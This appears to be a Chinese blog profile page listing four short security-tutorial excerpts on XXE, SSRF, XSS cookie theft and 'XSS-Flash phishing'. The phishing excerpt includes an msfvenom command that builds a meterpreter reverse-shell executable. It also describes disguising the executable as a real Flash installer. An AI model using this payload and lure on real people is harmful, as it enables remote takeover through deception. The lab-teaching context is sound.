自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(4)
  • 收藏
  • 关注

原创 Apache2---XXE 靶机漏洞实战保姆级教程

思路:1.nmap,dirb扫描,进行一个信息收集。3.利用已知漏洞,注入xxe语句,查看关键文件信息。以下就是对Apache2靶机的一个xxe渗透过程。2.用burp工具抓包,查询可利用漏洞。4.简单的代码审计,最后获取flag。希望可以对大家有帮助。

2024-07-25 21:09:34 224

原创 CTFHub----WEB-SSRF全网最详细的保姆级教程!!!!!!

1.我们直接访问flag.php发现没有提交按钮,所以我们需要自己写一个按钮,前端的东西还是很容易修改 的, 把这个标签直接插入到下列html中去。2.在这里我们用的是第一个 file:///,去访问本地计算机中的文件,访问成功后看见有三个问号。file:///-------- 本地文件传输协议,主要用于访问本地计算机中的文件。3.,我们可以使用localhost来代替,也是本机的意思.成功获得flag。

2024-07-24 22:18:51 770

原创 XSS-Flash攻击钓⻥

进⼀步对提供下载的Flash⽂件进⾏伪装,在真的Flash官⽹下载安装程序并在kali使⽤msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > shell.exe。点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏",配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!中的这⼀⾏代码,改成我们伪造的flash⽹站⽹址。

2024-07-23 22:58:33 240

原创 XSS-窃取Cookie

XSS攻击-窃取Cookie

2024-07-23 15:50:31 101

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除